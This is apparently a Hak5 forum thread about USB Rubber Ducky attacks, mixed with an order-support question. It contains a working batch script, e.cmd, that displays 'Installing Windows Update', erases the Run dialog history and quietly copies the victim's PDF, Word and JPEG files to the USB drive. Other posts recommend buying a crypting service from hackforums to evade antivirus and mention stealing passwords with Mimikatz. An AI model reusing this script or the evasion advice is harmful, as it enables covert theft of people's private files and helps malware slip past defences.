felipe

unfortunately mimikatz got detected. do not upload anything to virustotal.

works on win7 ??

Need help here.. It will steal all pdf, doc, docx, jpeg, jpg from %USERPROFILE ? e.cmd @echo off @echo Installing Windows Update REM Delete registry keys storing Run dialog history REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% mkdir %dst% >>nul if Exist %USERPROFILE%\Documents ( REM /C Continues copying even if errors occur. REM /Q Does not display file names while copying. REM /G Allows the copying of encrypted files to destination that does not support encryption. REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. REM /E Copies directories and subdirectories, including empty ones. REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul REM Same as above but does not create empty directories xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.doc %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.docx %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.jpg %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.jpeg %dst% >>nul ) REM Blink CAPSLOCK key start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" @cls @exit

What is illegal for you? Run a pendrive for grab passwords or crypter service? I don't know about EU, im from brazil... So, about another way? I don't know, sorry =/ Of course everything in hak5 is trustworthy, and if has that possibility would be perfect. anyway...I hope I´ve helped. And sorry for my bad english

Buy an "Crypting Service" for you... Google: Crypting Service or go around like hackforums and others. And before purchasing some shit, read about scantime, runtime, dependencies etc...

I am experiencing exactly the problem that you have mentioned about the support of hak5. my order is: #92373 purchased rubber duck 16/12 i know, its backordered... but i asked about udpate personal info (like fullname and taxid)...I haven't seen any field asking my tax id and that matter for brazil a lot. and now i got another question, it´s possible the rubber ducky comes with Duck Twin Exfiltration files working on(pt-br)? sorry for my bad english and thanks a lot Merry Christmas for all